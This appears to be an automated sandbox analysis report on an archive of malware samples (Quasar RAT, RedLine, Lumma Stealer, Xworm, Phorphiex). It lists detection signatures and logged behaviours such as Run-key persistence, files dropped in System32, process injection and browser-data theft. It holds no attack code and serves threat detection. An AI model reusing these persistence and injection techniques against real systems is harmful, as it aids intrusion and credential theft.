Analysis Overview
SHA256: cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Threat Level: Known bad
The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
RedLine payload
Detect Xworm Payload
Lumma family
Lumma Stealer, LummaC
Redline family
Quasar payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Quasar family
RedLine
Phorphiex, Phorpiex
Xworm
Phorphiex family
Xworm family
Phorphiex payload
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
A potential corporate email address has been identified in the URL: [email protected]
Drops startup file
Loads dropped DLL
Executes dropped EXE
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
UPX packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
System Network Configuration Discovery: Internet Connection Discovery
Program crash
Enumerates physical storage devices
Detects Pyinstaller
Unsigned PE
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
Suspicious use of SendNotifyMessage
Runs ping.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Opens file in notepad (likely ransom note)
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Modifies data under HKEY_USERS
Modifies registry class
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported: 2024-12-14 20:22
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2024-12-14 20:22
Reported: 2024-12-14 20:29
Platform: win7-20240903-es
Max time kernel: 354s
Max time network: 355s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4828 created 512 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2916 created 1276 | N/A | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\mnftyjkrgjsae.exe | C:\Windows\Explorer.EXE |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
A potential corporate email address has been identified in the URL: [email protected]
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Security = "C:\\Users\\Admin\\AppData\\Roaming\\$77Security.exe" | C:\Users\Admin\AppData\Local\Temp\$77Security.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\m.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\RuntimeBroker.exe | N/A |
| File opened for modification | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\RuntimeBroker.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\Tasks\$77Security | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77Security | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Discord | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3596 set thread context of 3664 | N/A | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\MK.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3876 set thread context of 3916 | N/A | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe |
| PID 4828 set thread context of 2616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File opened for modification | \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\sc_reader.exe | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\m.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\m.exe | N/A |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\8fc809.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe |
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 1826adc8664edb01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlot = "8" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000020000000300000001000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 02000000030000000000000001000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0c00000050000000a66a63283d95d211b5d600c04fd918d00b0000007800000030f125b7ef471a10a5f102608c9eebac0e00000078000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
